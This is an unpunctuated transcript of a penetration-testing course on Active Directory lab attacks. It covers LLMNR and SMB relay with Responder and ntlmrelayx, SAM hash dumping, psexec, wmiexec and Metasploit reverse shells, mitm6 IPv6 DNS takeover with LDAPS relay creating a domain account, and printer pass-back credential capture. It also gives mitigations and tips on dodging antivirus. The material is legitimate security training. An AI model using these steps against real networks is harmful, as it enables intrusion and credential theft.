then you could still go and use other things like their name for example the company name with a one or one exclamation or one two three you just gotta get creative with it and think outside the box and things again like fall 2019 or whatever year it is winter whatever whatever season it is as well putting those in there and just trying to use the easy way out you got to think like a user who's wanting to use the easy way out and you're going to be very successful with this so that is it for this lesson from here we're gonna go on and talk about the mitigation strategies and then we'll move on into some more attacks so I'll catch you over in the next video all right let's talk lmnr mitigation so the best defense here is to actually disable lmnr you have to disable not only lmnr but also mbtns because remember if DNS fails it goes to lmnr F L M and R fails it goes to mbtns just cutting out lmnr isn't enough so to fully disable this you have to disable both here is how you kind of do it this is just a copy and paste of what I would actually send to a client or put on a report for a client as to how to disable this if they are not able to disable lmnr or they just refuse to then the second option is to tell them to enable network access control which if you're not familiar with what that means network access control means that hey I can't just go and plug into any port on your network and gain access it's going to look for a MAC address and say does this Mac address belong and should we allow it and a lot of the times if it doesn't belong or it's not allowed you're actually going to shut that Port down or otherwise it's just not going to let you on the network so there are bypasses to network access control but think again that this is an internal and you just want to make it as hard as possible for somebody to get into your network and that would prevent this attack from even happening or at least you know stall the attack from happening the other thing here is to require the strong user passwords so 14 characters or longer you know 40 character passwords probably the best you know long sentence whatever however long you want to make it but it should be longer than 14 characters and that's really what you want to harp on your your policies to your clients is you you want to tell them like yeah you can have your minimum but you should stress how easy it is to crack these passwords the longer the password the harder it is to crack and it goes from like seven or eight characters being you know a couple hours to or even seconds to hours you know from 14 characters 15 characters being years to crack in a Brute Force attempt so just that difference in a few extra characters and just making it a little bit longer really does make a difference and it makes it really hard on us as an attacker to be successful so hopefully that makes a little bit more sense and when you're an interview you can talk through lmnr talk about disabling it for best case scenarios and talk about other mitigations to prevent these sorts of attacks as well so from here we're going to move on and talk about how we can utilize lmnr poisoning to our advantage in other ways and not just capture a hash and crack it but actually use that hash to our advantage and gain access to a machine so let's go ahead and take a look at that all right so now let's talk about SMB relay well what is SMB relay so think about your responder and think about how you were capturing these hashes well instead of taking the hashes that you capture offline and trying to crack them with hashcat well we can take those hashes and we can actually just relay those to another machine well how is this possible so let's talk about the requirements big requirement Number One requirement is that SMB signing has to be be disabled on the Target now SMB signing is a packet level protocol so let's think about this if SMB signing is enabled when we try to relay credentials it's going to say hey you're not really that person I you're you know this packet's not signed by you and I'm not going to let you in but if SMB signing is disabled it never checks for that it never checks for authenticity of where this is coming from it just says hey there's a user there's their hash I'm going to let them on this machine if they have the permission to do so so we're going to take this first requirement and add in a second requirement which is that the user being relayed has to have admin credentials on that machine so we cannot relay a credential that we captured from one machine back to the same machine say we're like dot six we can't relay that credential 2.6 as well this has to be on two separate machines and that user has to be an admin on that machine with SMB signing disabled so we're going to take say Frank Castle he's going to be an admin on two machines like we set up we're going to take the captured hash relay it over to another machine where he's also an admin and we're going to do some malicious things to that machine so let's take a look at this from a more actual perspective so the first thing that we're going to do is we're actually going to go into the responder configuration file and we're going to turn off SMB and HTTP so we're going to be listening but we're not going to be responding on these servers okay so what that means is we're going to use responder to capture and then we're going to use another tool to relay but we're not actually going to respond back so once this configuration is set what we're going to do is we're going to boot up responder so with responder booted up same way as before you're going to notice here the only difference is there's red on the HTTP and red on the SMB server the off proxy was off by default and Still Remains off so this is how your configuration should look once this is configured we also need to configure a tool called ntlm relay ax so NTM relay X takes the relay it passes it to a Target file that you specify and we'll talk about how we identify those Targets in the next video and then we're going to say SMB to support as a switch as well so that we can incorporate anything with SMB 2. so what we're going to do here is all we're doing is identifying where we want to Target and where we want to relay to so we have our responder listening we have our relay ready to go and then we just wait for an event to happen same event as before we pointed at this machine with responder listening it can't access this machine DNS fails okay responder kicks in response to that message or doesn't respond to that message I should say and instead it relays these credentials that it captures to this other machine you could see it here it says hey we received a connection from 10.0.3.7 and we're going to attack the target of 10.0.3.6 using Frank Castle's credentials if Frank Castle is an admin on that machine this is going to work so it authenticates against it it succeeds guess what now we're coming in here and we're dumping out sensitive information most importantly we are dumping out what is called a Sam file or the Sam hashes here right now remember back to our lesson on Linux when we talked about Shadow files think of the Sam as the shadow of the windows World these are all of our usernames and hashes for the local users on this computer again this is the local users on this computer this is not the domain users but that's okay we can take down an entire network and I've done it before utilizing only local users we're going to talk about that in a later video on how that can happen but from here we have usernames and hashes okay we could take these hashes offline again and try to crack them or we can pass this hash around and try to get access to other machines as well so take a look at both of those and see why this is really really interesting here later on so for now take away that we grab a hash we relay it to another machine if SMB signing is disabled we can get on that machine as long as we're an admin we can not only dump the Sam hashes like this but we can also take it further and get a full shell if we want to so we're going to do that in both scenarios we're going to play this scenario first then we're going to play another scenario where we actually get a shell you can see how you can do both of those so let's go ahead and move on to the next video we're actually going to demonstrate an SMB relay so there's one small modification we need to make before this attack can begin and be successful so on both of your Windows 10 machines this is something I forgot to tell you during the lab setup is we need to go to this network tab over here and make sure that our computer is visible to other devices so we're going to turn on network discovery and let's go ahead and just hit OK we're going to click up here and just say turn on network discovery and file sharing and now it's on okay and you can see that other machines are starting to show up that's great other machine same thing let's go in here let's go to network turn this guy on and then we should be able to proceed with this attack moving forward so let's go to the next video we start discovering how we can actually find machines that are disabled or have SMB signing disabled in our Network all right so first things first we need to be able to identify what has SMB signing enabled and what has SMB signing disabled now there are a few different ways that we can do this one way would be to run a NASA scan and when you run nessus it'll tell you nice and neatly hey look this has SMB signing disabled on these servers and you can copy that list down if you want to another method which I'm going to show you is nmap we can run a specific script on nmap that is built in and it'll check for SMB signing and then lastly you can go out to GitHub and search for something like SMB signing check and you will find a bunch of different scripts that will do this for you or you can write your own if you really want to so we're going to do is we're going to just use nmap here and just do a quick check and then we can kind of understand what we're looking for so we're going to type in nmap and then we'll do a dash dash script like this and the script is called smb2 Dash security Dash mode dot NSE this is MF scripting engine and we're going to be looking just on Port 445 and then we're going to sweep across the entire network that we're on so it should look something like this and it should go by pretty quick for us so let's go ahead and just enter and what's going to come back is whether or not the port is open as you can see here like this has filtered on this port it's going to come back whether or not the port is open and whether or not SMB signing is enabled or disabled let's ignore.1.2 Okay so dot 140 this is where we start at least for me dot 140 is our server so this is our domain controller and you can see in the domain controller message signing is enabled and required so remember when we talked about message signing we said that it is disabled by default on any workstation and enabled and required on every single server by default okay so we expect to see this we will not be able to relate to this machine however if we look at 141 which is the Punisher and 142 which is Spider-Man we can see here that 141 and 142 will both say the same thing message signing enabled but not required so it's enabled but it's not required meaning that we can still do a relay attack because of the non-requirement here so what we can do is we can take the list of IP addresses that we have here given 141 and 142 and put those into a list and we can go ahead and do that now so let's just go ahead and say G edit and you'll see my Target's already here but we're going to say G edit targets that text hit enter and I actually only want you to put one Target in there so I'm using Peter Parker's machine so let's go ahead and just use Peter Parker's machine whichever one you have your secondary machine on you should have a 141 142 whatever the IP address actually is go ahead and just pick one of those machines here in a perfect world you would put all your machines in here but we're just going to simplify this for the attack go ahead and save that out and then I'm going to pause here we're going to meet in the next video where we can figure everything and we'll set up the relay and see how the attack looks so I'll catch you over in the next video all right picking up right where we left off so we now have our targets.txt swing chat targets.txt and we've got the Spider-Man computer sitting here at 142 and remember our other computer is sitting at 141 and we're going to relay our credentials from responder from 141 to 142 and hopefully get something good back so we need to set up a responder so let's go ahead and go to G edit and we're going to go edit the Etsy responder and responder.com file this is the config file and remember we need to turn off SMB and we need to turn off HTTP here so your settings should look like this go ahead and save that and then we're going to run responder just like we did before so we're going to say responder capital I like this ethernet 0 and then rdwv just like that should hit enter once you're ready and if we scroll up just a tad it should look just like the picture did before where we have a few more Reds mixed in with these greens here SMB server is off HTTP server is off so now we're listening for events now we gotta set up the relay so let's go ahead and open up a new tab I'll make this a little bit bigger and we're going to use ntlm relay x dot Pi we're going to set that Target file with the dash TF and that is targets.txt and then we're just going to say smb2 support let's go look just like that hit enter and now the server has been started we are waiting for a connection to happen so let's go ahead and Trigger that connection so I'm going to open up my Punisher machine and I've already got it signed in so punisher's online here make sure your punisher's online and your Spider-Man machines online and I'm going to just go ahead and point this right at my attacker machine again so nine two one six eight fifty Seven one thirty nine this is the same thing we've been doing with responder just this time it's going to relay instead of capture hash so go ahead and hit enter here it's going to say there's an error but look at what's Happening Here beautiful okay so we come in here and you can see it's connected a couple times let me make this bigger you see okay it comes in it says hey I'm receiving this connection from 141 let's go ahead and attack our Target of 142 and it's going to authenticate it's going to succeed why remember SMB signing is disabled here it is enabled but not required that is considered the same exact thing okay so it succeeds and and most importantly Frank Castle F Castle here is an administrator on this computer because this user is an administrator on this computer guess what we dumped the Sam so we've dumped the Sam hashes and now we have these hashes these wonderful hashes okay and we can copy these hashes we can take them offline we could try to crack them and we can try to move laterally with these hashes what I want you to do is copy these hashes and we'll save them for later we'll talk about this again we'll revisit hashcat work on cracking these we'll also work on passing these around in a later section so for now just know that we have dumped the Sam hashes which is just like the shadow file on a Linux machine and there are things that we can do with these hashes so we're all building up into gaining shells getting access doing more cool stuff but here we've got some access to this machine and now we can start trying to move laterally with the axis that we have or even move vertically so from here that's it I just wanted to show you this quick demonstration of how this could be potentially vulnerable and this is an easy attack to pull off and it's by Design again no settings really changed right this is just how default Windows environments are so this is a very common occurrence especially if the environment has a lot of local admins and you have a lot of local admins on the same machine or the same user local admin on a lot of different machines so from here we're going to make another video and the next video is going to cover improving upon this just one example of how we can improve upon this we can actually take this and get a shell out of this so I'm going to show you how to do that and we'll improve upon it then we'll talk about how we can prevent this or talk some defenses and then we'll move on to the next attack so I'll catch you over in the next video all right let's take a look at making this shell interactive for us so we're going to run the same situation here I'm just going to tap up because I already have it saved so let's boot up responder again if you're just catching up we have HTTP off we have SMB off and we've got responder listening let's go ahead and load up ntlm relay and the only thing that I'm going to do here a little bit differently is at the end I'm putting in a dash I now dash I stands for interactive and we're going to try to get an interactive shell here let's take a look at what this looks like so go ahead and hit enter this is just going to sit around and wait and we're going to trigger that event again so let's go ahead and do that I'm going to log in triggered this event one more time let's see what happens over here okay so you can see it says receive the connection it succeeded and then it says it created an SMB client shell on one two seven zero zero one eleven thousand so yours should say something very similar to that go ahead and open up a new tab and just say something along the lines of netcat one two seven zero zero one eleven thousand and then it says type help for a list of commands let's say help now we are in a SMB shell essentially and we can do quite a bit of things here we're in a file share so what can we do well we can uh we can look at the shares we can use a certain share we can change the password of our current user and we can look at making directories removing directories removing files we can put new files get new files we can create a mount Point there's a lot of different things we can do okay and so let's take a look at this so let's just say shares and we've got the C drive admin IPC and we got that share folder that we created um so let's go ahead and just do something like use C dollar side okay and let's go ahead and just say LS now look where we're at we've got access to the C drive here if we wanted to use the admin which we could get to this other ways we just say use admin hit enter LS and look now we're in the admin so we're in system 32 here on a Windows machine and we just have full control of this computer we can add files get files we have a lot of control here so there are other things that we can do as well that we're not going to cover but I do encourage you to explore so I'm going to control C this couple things to point out is we can say something like Dash e for execute and then we could set up an interpreter listener like uh test.exe we can generate msf Venom to create a payload and then we can set up a interpreter listener and go get a shell and Metasploit with multi-handler we could do a dash C for command so that this executes some specific command when we run the machine it could be something as simple as who am I uh to a complex Powershell reverse shell or something along those lines that we can talk back to us as well and get a shell with that so the interactive shell is not the only way to do these but it's another way to do things so we just want to improve upon everything that we get so again we have those hashes we're going to figure out what we can do with those hashes later so again make sure you have those saved once we get to the post compromise attacks section we're going to abuse those frequently so for now that's it let's go ahead and talk in the next video about defenses and then we'll talk a little bit about gaining shells and some other attack vectors before we get into post-compromise enumeration so I will catch you over in the next video let's talk about mitigation strategies so what can we do here well we can enable SMB signing on all devices right and that is the go-to strategy the pro here is that it completely stops the attack the con is that there can be performance issues with file copies it's reported that it's about a 15 or so decrease in speed on file transfers when you're running with SMB so that SMB signing does cause a little bit longer time period but the thing I argue is that the longer time period for you know computer security is worth it it's worth the trade-off other options that you can take is you can disable ntlm authentication on the network if there is no ntlm authentication then it completely stops the attack however if Kerberos stops working as the authentication method then Windows is going to default back to ntlm anyway so it's not a Fail-Safe completely more things account tiering is super important so what that means is if you have a domain administrator that domain administrator is only logging into their domain accounts or their their domain servers their domain controllers right they're not logging into a user account because that would be really bad if we can capture a domain administrator in this sort of attack uh the other thing too is that you want local admin restriction here so if we don't have a local administrator this can prevent a lot of lateral Movement we can't really get the shell we can't get the hashes that we saw none of that would happen if that Frank capsule user was not also a local administrator on another machine so the con here is that you might see a potential increase in the amount of service desk tickets users complain about it they always want to have admin but it's not usually in the best interest of the company to give your users administrator rights on a computer so that's it for SMB relay big thing to talk about again is that SMB signing should be disabled and that local admins should be really restricted here the other two are just best practice sort of things but still don't completely eliminate the attack so from here we're going to go ahead and talk about gaining shell access and how we can gain shells with some of the information that we've already gathered right now and then we'll move into some IPv6 attacks which are really really fun and on to enumeration so I'll see you over in the next video all right let's talk about gaining shell access now this should be somewhat of a refresher video because we covered a lot of this in the mid-course Capstone but I just want you to think about what you can do now that you have a credential so so far all we have is a credential right and we're going to see what we can do with that credential so the first thing I want to do is I want to boot up Metasploit and we'll say msf console and if we have SMB open and we have a username and a password well then we can use that username and password and especially if that user has a machine in their local administrator to gain a shell we can use that with PS exec so we can search for PS exec or if you know the windows exploit SMB PS exec you can do that as well so here it's use 10 it's line 10 right here and we'll just say options now what we can do is we can set the r host so we know the F Castle machine is at 192.168 57 141 and then we have to say set SMB domain to marvel.local set SMB pass to password one and set smv user to F Castle okay we could say options here and we could try to run this but we need to run this with the appropriate payload so let's go ahead and just set the payload right off the bat with set payload Windows we're going to say x64 interpreter and then reverse TCP and we'll go ahead and say options make sure everything looks set let's go ahead and set an L host as well so we'll set the L host to ethernet 0 here and we'll go ahead and give this a run and see what happens now this doesn't always authenticate on the first go and it always doesn't authenticate with the first automatic targeting so we may have to give this a go with a second attempt or we may have to give this a go and see it's not working here we'll give it a go one more time looks like it's doing Powershell Powershell might not work here we might have to try a different Target so it's always good to explore your targets here and PS exec is one of those funky ones where either it's going to work or it's not going to work with that specific one so let's show let's show targets and we've got automatic Powershell native upload and mof upload so let's go ahead and just set Target of two and we'll run that and we've got a virus detected what happened oh no so if we go to our Windows machine you may have heard the ding we've uh we've got a virus detection here so um what's happening is that we are we are blocking this virus with the PS exec right and somehow Windows Defender got turned back on I don't know how that happened but that's okay if yours got turned back on that's fine as well this is a good Learning lesson so PS exec's getting blocked so what if we can't pass exec okay let's try something different um let's go ahead and let's try a new tool so let's go ahead and let's try psex.pi and see if that works let's do a dash dash help just to see how this looks this should be familiar to you right we're just going to use the domain username and then password at the Target name so all we're going to say is marvel.local and we're going to say something like F Castle and then we'll give it the password one at 192.168 57 141 run that apologies it's a forward slash try that okay and look here so interpreter got picked up PS exec dot Pi did not okay we got a show with PS exec.pi now this is a little bit more obscure this is not infinitely more obscure there are still anti-viruses that are going to pick this up but Windows Defender which I love Windows Defender Windows Defender did not pick it up right here so bad on Windows Defender um but still here we are we've got a shell in the system now we could take this and we can get a little bit more quieter so we can say Ctrl C and kill this and we can go in and we can do SMB exec or wmi exec we could say SMB exact like that and that one didn't work okay let's try wmi exec and see if we can get that one to work and this one doesn't look like it's going to work either which is okay so we need other options and this isn't the first time you're seeing any of this right we saw this in the very last video of the mid-course Capstone where we can try SMB exec and W my exec and just be familiar with these tools so what you have and what I'm trying to point out here is don't give up on the first tool you have at least four options I just provided you here and if you saw in Metasploit we actually have more than that we have a Powershell feature as well if we scroll up just a little bit there is a Powershell version of uh PS exec as well so don't just give up at the first one and know that there are multiple options and if I alt tab back into that you can see too that you know we we were able to get in with our PS exec but we weren't able to get in with our um with our wmi exec or we weren't able to get in with our PS exec on Metasploit either right so it's important to know that we have all these different options available to us and that PS exec is one of the more noisy when it comes to antivirus so I would avoid starting here my tip Pro tip is to start with something like SMB exec or wmi exec see if they work see if you can get a shell if you can what you can do they're only like half shells is what they're considered they're not fully interactive but they're good enough to navigate around the C drive you can issue commands with these there's a lot of things that you can do so what you need to do is you navigate around and you issue some commands and you say hey let me figure out what type of antivirus if anything's running and then you once you figure out what's running try to see if you can't disable that antivirus so then you can run something more robust like Windows interpreter or interpreter on Windows because it just does so much more for us so what we're going to do is we're going to go back and we're going to disable that in Defender I'm going to make sure that that's all disabled again if yours re-enabled just go ahead and disable it as well as we move forward make sure those are disabled so that we can perform some of these other attacks with Metasploit and again and the tip here is to make sure you get in quietly first go in navigate around try to find the antivirus that's being used then attempt to use something like PS exec or even another method in Metasploit to get around it so hopefully that all makes sense and you don't give up at the first failure so that's it for this video we're going to move on to IPv6 attacks next let's talk about IPv6 attacks and mainly we're going to be talking about are DNS takeover attacks via IPv6 and as of right now this is the go-to attack for me it used to be responder you know grab the hashes try to crack them and then it was SMB relay and if you can't crack the hashes well try to relay them well this is just another form of relaying but it's so much more reliable because it utilizes IPv6 and I'm going to just use my pen for this one we're just going to kind of talk through this and you're going to see how terrible I draw by the way and then we're going to go right into it and you're going to see how cool this really is I can't even explain how awesome it is so IPv6 attack if you think about a machine running on a Windows Network we typically run on ipv4 right and we have the box and it's typically running ipv4 in the network chances are the Network's not even utilizing IPv6 if you go look at your computer now and you go into your network adapter properties chances are IPv6 is turned on but you're utilizing ipv4 if you do an ipconfig just for a Windows example right so if we're utilizing V4 but V6 is turned on who's doing DNS for V6 and the answer usually is nobody nobody's doing that so what we can do is we can say hey I'm going to set up a attacker machine we'll give him a smiley face and kind of a smiley face and we'll um we'll take him and we'll listen for all these the six messages that come through and we'll say hey I am your DNS okay I'm gonna spoof the DNS server so send all your IPv6 traffic to me and then I'll go ahead and just pass that along for you the issue here is that when this happens we can get authentication to the domain controller so say this is the DC we could get authentication to the domain controller via ldap or we can do so via SMB so what we can do is we could take for example and you're going to see in the example that we reboot a machine that reboot just triggers an event that event comes through to us we can use that machine to log into the domain controller and it doesn't have to be an admin or anything and we can get information a lot of information out of just that we could potentially use that machine to create another machine as you're going to see from a Blog example and we can wait for somebody to maybe log into the network or use their credentials somewhere and guess what that comes to us in the form of ntlm just like responder just like SMB relay and we relay this we do what's called ldap relaying we ldap relay over to the domain controller with this ntlm credentials we log in if it's a domain administrator to the domain controller and guess what we create an account it creates an account for us this tool that we're going to use is called man in the middle six mitm6 and what we're going to do is we're going to use this tool it's going to do all this for us we're going to combine that with ntl and relay X and it's going to relay into ldap from our ntlm credentials and then this tool is going to create along with ntl and relay X is going to create a new account for us and it's going to do so many awesome things so I'm really excited to show it to you we just have a couple steps we have to do we have to download man in the middle six in the next video we have to set up ldap S really quick which is just a certificate and then we're going to be rolling and this is one of the most fun attacks still very undetected very hard to detect and still very very prominent in networks so let's go ahead and move on to the next video get me in the middle six installed and then let's go ahead and see a live demonstration of what this attack looks like in order to pull off our IPv6 man the middle attack we're going to need to utilize a tool called man in the middle six so let's go ahead and grab that tool now so we're just going to say GitHub mitm6 like this and we are looking for the fox Dash it right here go ahead and grab this clone or download copy that and then we'll scroll down look for any dependencies looks like it's just a pip installed so we're going to do this here CD into our op folder as always get clone and paste now CD into your new folder LS here and we're just going to say pip install and we should do pip 3 actually pip3 install and we can usually do period and that will install the requirements for us so this will take just a second now to install I don't believe it's a very long install and we're already done here so that is it so it should just take a second for you once you have it installed go ahead and meet me in the next video when we break it all down and we start the attack in order for me to fully show you and allow you to appreciate this attack we have to do one more configuration to our lab so what we're going to do is we're going to go into the server manager here and we're going to make sure that we add one feature which is going to be a certificate so what we're going to do here is we're just going to go ahead and say manage add roles and features and then we're going to go ahead and just say next and next and next and the feature that we're going to add is going to be the active directory certificate services so we're going to go ahead and just click on this and select add features and then we can go ahead and just next through everything here next next next we want the certificate Authority or certification Authority here and then we're going to say restart the destination server automatically if required and then we're going to hit install and this should just take a quick second here so give it a second if you need to pause go ahead and pause and then meet me back once you have your installation completely configured alright so let's go ahead and close this and open up this right here with the exclamation is we're going to go ahead and configure we're going to hit next and click on certification Authority here we're going to hit next and next next and next and then we're going to just go ahead and click uh shot 256 is fine we'll hit next on this and then we'll just change this 5 to 99 here next next and configure so all we're doing is we're setting up a certificate so that we can run ldap on a secure side so we're going to run ldap secure now we could pull off this attack with ldap but it's a lot easier with ldap secure so now all we're going to need to do is reboot This Server go ahead and do that once you've got that done you're up and running go ahead and meet me in the next video and we'll make sure that we can pull off this attack so to begin this attack we need a few things here we need man in the middle six so we're going to go ahead and just say MIT m6 and we're going to say a domain now my domain here is marvel.local so we'll do domain of marvel.local we'll spin that up and we're going to just start getting replies coming in from different devices in our Network okay so from here what we need to do is also set up a relay attack so now that relay attack is going to look something like this ntlm relay x dot Pi this should look familiar we're going to do a dash six because we're only going to work with IPv6 we're gonna do a dash t for our Target and our Target is going to be via lvap secure this is why we set up that certificate we could have done ldap most environments have that certificate running so it's important to do ldap secure and we're just going to point this right at the domain controller so whatever your domain controller IP address is mine's sitting at 140. for this wh we're just going to use a w pad so I'm just going to call this fake wpad.marvel.local and then we're going to do a dash L and I'm just going to call this Loop me uh Dash L is for loot so if we set up loot we can dump out some information that'll be useful to us and we'll see how that works so let's go ahead and just hit enter on this and this is still getting some spoof replies but we're going to speed this along so I'm going to go ahead and go over to my Windows 10 machine I'm just going to reboot this sucker and this is going to allow us to see this in action what's happening is IPv6 is sending out a a reply right and it's saying hey who's got my uh who's got my DNS and it sends that out about every 30 minutes I believe so what we're gonna do is we're just gonna speed it up by shutting the computer down and then restarting it it's going to actually go ahead and make this go a little bit faster so we're going to try to authenticate when we restart it's going to try to authenticate first as The Punisher machine you could see this by The Punisher dollar sign and you can see that it's enumerating the relayed credentials it's going to take a while on large domains that's fine and it's just exceeding right now it's trying to see what kind of privileges it it has right now so it might take a minute um and it's dumping any info into the looter so if we open this up let's see if there's anything in here right now we can just go ahead and just say LS and there's this Loop me folder so we can CD and dilute me and this is so exciting so look at all this here domain computers domain uh computers by operating system by just domain computers domain groups domain policies domain truss domain users by group now I love this because we can come in and we can say something like Firefox I want to see the domain users by group and we can just look at the Domain users by group and I'm right after the domain admins on top of that you know when you have a crappy kind of uh admin going on what about the SQL service that we set up and remember when we put in the description that password is my password one two three uh oh you know people think that these descriptions aren't visible and look we we it's visible to us and we barely did anything right we just succeeded with an account we succeeded with a computer the computer was capable of accessing this domain controller via ldap S logging into it and dumping out any useful information to us that's scary right we have all this information in our hands now we can see who the domain administrators are and the Enterprise admin to all the users are who do we need to attack in this environment for this to work in our favor now let's do one more thing let's go ahead and go into our Windows 10 machine and we're just gonna say password exclamation like this and you're going to see what's going to happen so let's go ahead and my mouse will come back to me we'll go ahead over here and here shortly it should attempt to log in as this user and we'll see if it works and there it did and it's so fast it just blazed through let me go ahead and Ctrl C so what just happened here an admin logged into a computer that's what happened that's it and you can see the administrator logged in somewhere on this network it succeeded it targeted ldap okay and then it comes through and it tries to make a new user for us first it sets up an access control list for us and that's awesome and then it tries to create a new user and then it says Hey adding new user and here's a username and here's a password okay now we own this domain because what it's going to do is it's going to try to go in and it's going to try to grab all this information for us and it's it's amazing what we can do so let's save this information out and just see how it works another thing look at this let's go ahead and go to our domain controller if we go to our domain controller here and we go to our users and groups let's refresh it this is before the attack let's go ahead and just do a refresh really quick if I can find the refresh button or I'll just refresh from here and now look the nfsg whatever this user is now in here and they're a domain user but they set up a policy for us to have exclusive privileges with that access control and what happens is if we actually control C and we just c d dot dot we LS it puts this ACL pwn restore here so we can actually restore the ACL to what it was before but as of right now it's allowing this user through and a special ACL that was created with this with this attack here so this is a fantastic attack and this isn't the only thing that it can do it does so much stuff I'm going to actually link down below some amazing things that you can do with this and I want you to read up on this because it's so fantastic so I'm gonna put this in here paste this real quick and just scroll down a little bit and show you this blog post and this is one of the ones I use all the time so you could run this man in the middle six with what is called a delegate access and say for example that you can't get an administrator to work maybe this computer succeeds look at this icorp W10 dollar sign succeeds you could still add a new computer not just a user a new computer with a username and password and you can utilize that to attack the computer that authenticated you you can impersonate users on that computer that you use to set that up with it's an awesome attack it's called delegate impersonation or delegate access and it is um it's amazing so I do recommend checking this out again I'll put this down in the resources below great blog so that is it for this attack in the next video we're going to cover how to actually defend against this attack and what you can do it's fairly simple but we'll still cover it so that's it I'll catch you over in the next video okay let's talk through these briefly and in the last video I said the solution is pretty easy well that's kind of true kind of false the solution is easy if we just go willy-nilly and we disable IPv6 this completely prevents this attack right if IPv6 isn't enabled in the network then guess what we can't be an IPv6 DNS server because there's nothing for us to do so disabling IPv6 can have unwanted side effects so the recommended thing to do is actually to prevent some of these so we just Define block rules instead of allow rules when we have our firewall so I've listed those here you don't have to worry too much about them this could be something to just copy a picture of and have for your notes especially if you're studying up I don't think you'll ever be asked this in an interview but if you're ever pulling off this sort of attack it might be good to know for a client purpose another thing to note is that if we're not using wpad then we should disable it with group policy and this tells you just how to do that and then the relaying so we did relaying to ldap and ldap S we only can mitigate this by enabling ldap signing and channel binding so that's another mitigation strategy here so we could have prevented the ldap attack that you saw but typically ldap signing and channel binding are not enabled by most clients I can't remember a time that I've seen it so last thing to consider is that we can put users into the protected users group and that would prevent impersonation or delegation which we didn't actually cover a delegation attack but I did show you that blog posting where it had the delegate access if we're able to do delegate access against a machine then we can you know just abuse that feature even more and so to fully disable this there's a few different things that we have to do we can cut the head off by disabling IPv6 but best practice says hey you know we should actually just do some block rules in the firewall we should disable a wpad we should disable or enable ldap signing and channel binding and we should consider moving our admin users to the protected users group so with this being said again don't worry too much about this I just like to cover the mitigation strategies to talk about it if you want to practice this in your lab if you want to go back as we're going through some of these and you want to turn off different things that I'm showing you in defenses and try to mitigate these I say more power to you see how this works and how it affects certain attacks and I think that's a really awesome strategy as well but otherwise just take maybe a screenshot of this and don't Focus too much on memorizing it so from here we got one more video left we're going to tie everything together and then we're going to get into post exploitation enumeration so I'll catch you in the next video let's talk about one of my favorite attacks and this is a classic that goes back to printers and even iot devices and you still see it occasionally in networks it's really a bug that has to do with a printer or a different kind of device and when we get into it you'll be like whoa I've seen that before most likely if you've done any sort of it work and this attack is pretty epic honestly and I I recall a time where I was scheduled to do a pen test and it was an internal pen test and the company I was working for for some reason scoped an internal pen test for four hours so literally I had four hours to attack a network and get domain admin that's all I was allowed and I was on this network and realized pretty quickly that there was not much going on the the network was like a hybrid active directory Network there wasn't any responder any capturing of hashes in the traditional way however there was a printer sitting out there with default credentials on it and there were two setups going on um there was a SMB share user basically this SMB user will scan files to a folder and you can think of that like if you go to a printer and you just go scan a file and it ends up in in a folder on a share exactly what's happening now those are common and those can be set up with strong credentials it could be set up to not be a domain admin or any sort of administrator rights whatsoever except for just writing to that folder that's a proper setup and they actually have this set up properly except for some reason they also had the CEO's credentials in there okay and the CEO's credentials were sitting in there as a ldap connection for some reason I don't know why anyway I was able to grab those through this attack compromise that because he was a domain admin of course send them all kinds of wonderful pictures from their accounting software their Finance his CEO's email all kinds of fun stuff all because of a default printer password and a little bit of fun through an old technique so let's take a look at the technique now that I've kind of gone through a little bit of story time so I'm gonna scroll down on this webpage and I'll put this in the resources but basically we're looking for access to something that connects to ldap or something that does like an SMB connection or something along those lines that we can utilize so what's going on here if you can see this picture and this is really hard to demo in the lab so this is kind of a sip back and enjoy because there's not really a good way to say hey go buy this specific printer and let's go set this up basically what's going on is we have what is this ldap sign in setup you can see it's trying to sign in here do a setup a lot of times on these Pages where you have the connection you may have something where there's an IP address sitting in here and then there's a username and maybe even a password with a lot of asterisks put in it I see that a lot where there's just nothing but asterisks in there and you can't see the password it's hidden you can't like uh try to get in there with viewing the source or doing any sort of weird stuff although I've seen that before too usually it's pretty well protected however with this little ldap here if you change this from the domain controller which is likely where it's pointing to or the ldap server and you change it to your IP address your attacker IP address and you set up a listener now they show you with netcat netcat is fine you could totally use netcat you can also use responder so if you do a spin up responder and you have it listening this will also capture it but look what happens what happens is the password gets sent over in clear text so you have prints printer admin service is what the account name is you can see all the way across and then you see the password doesn't matter how long how complex the password is you can utilize that and grab the password in clear text amazing amazing amazing thing um and wicked bug that's still out there they're showing another example here with SMTP you can see the the password right here I'm going to make this a little bit bigger but you can see right here where it's all asterisks right doesn't matter you can point that to yourself and capture that as well they have all kinds of ways to do this so I'm going to share this article think about the pass back attack I've been in situations where I have literally been on engagements and there's nothing else out there except printers that I can somehow log into and you never know what's going to work out for you uh the the weirdest little default credential could open up a Pandora's Box and get you into all kinds of mischief and fun so don't forget about the pass back attack when you you are doing your active directory or internal pen test engagements so before we wrap up this initial attack vectors section I want to talk about the attack strategies that you might use when you're just starting out now we know all the attacks how do we piece it together and my thoughts are that we begin the day with man the middle six or responder and we sit there and we've talked about this in the previous videos but we want traffic to be generated right we need those users coming in so 8 A.M is a good time when users are starting to come in or even after lunch when they're starting to log back in you're going to have to run both of these on an assessment because you're going to have to assess for LMR in the network and you're gonna have to assess for IPv6 in the network so either one is fine if you're looking for like a quick win man of the middle six is probably faster nowadays but I still like to start out with a responder to see how well the network is responding to us right are they giving us hashes are the hashes easy to crack if so that's going to tell me that we're probably in for an easy assessment if I'm not seeing lmnr enabled that I might be in trouble here they might have had a pen test before or they might you know know some of the common attacks and are have already prevented against that so when you run those you're going to go ahead and run your scans to generate your traffic now chances are that you're going to be running a nessus scan to do this you might also be running an nmap scan of some sort to get quick results as well but most places run nesses now if your scans are taking too long if you have a big Network which it can happen what I like to do is I like to just look for websites that are in scope and this is another thing that we can do if we're trying to be quiet as opposed to just like running scans if your goal is to be quiet in the network something that you can do is you can sweep the entire network for websites okay and I look with a tool called HTTP underscore version it's just a module that you can search in Metasploit and you just say hey here's my range I want to look and see if anything responds to http version when I send out an HTTP request from my computer I want to see if anything else responds to that and that's going to be less likely to get picked up because you're making traffic on 80 and 443 which is very common right as opposed to Port scanning every single device in Network which is going to get picked up pretty easily by a good Sim so from here what can we do well we take those websites in scope and we can look at those logins and we can check those logins for default credentials and some of the things that we're looking for are like printers I have gotten domain admin off of printer more than one time so if you think about a printer what does a printer have a feature of typically has a scan feature and that scan feature is a scan to computer feature right well a lot of times an admin will make that user that has to be able to scan from the printer to the computer via SMB they'll make that user domain admin and that's overly permissive and what we can do is we can go in and we can dump those credentials into clear text get what the passwords are for the SMB user or they might even be using individual user accounts there's so many different things that they do and I've seen weird varieties but printers are a big one and a 